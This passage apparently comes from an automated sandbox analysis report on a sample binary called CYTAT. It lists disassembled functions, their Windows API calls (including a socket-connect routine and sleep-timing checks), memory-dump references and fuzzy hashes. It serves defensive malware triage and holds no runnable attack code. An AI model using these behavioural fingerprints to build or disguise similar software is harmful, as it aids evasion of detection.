                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$EnableMessageSend$LongShow
                                                • String ID:
                                                • API String ID: 142311417-0
                                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                • _wcslen.LIBCMT ref: 004458FB
                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                • String ID:
                                                • API String ID: 3087257052-0
                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 245547762-0
                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                • BeginPath.GDI32(?), ref: 0044723D
                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Object$Select$BeginCreateDeletePath
                                                • String ID:
                                                • API String ID: 2338827641-0
                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 4023252218-0
                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                • String ID:
                                                • API String ID: 1489400265-0
                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyWindow.USER32(?), ref: 00455728
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                • String ID:
                                                • API String ID: 1042038666-0
                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __getptd.LIBCMT ref: 0041780F
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __getptd.LIBCMT ref: 00417826
                                                • __amsg_exit.LIBCMT ref: 00417834
                                                • __lock.LIBCMT ref: 00417844
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 2403457894-0
                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 4247068974-0
                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$U$\
                                                • API String ID: 0-3705770531
                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
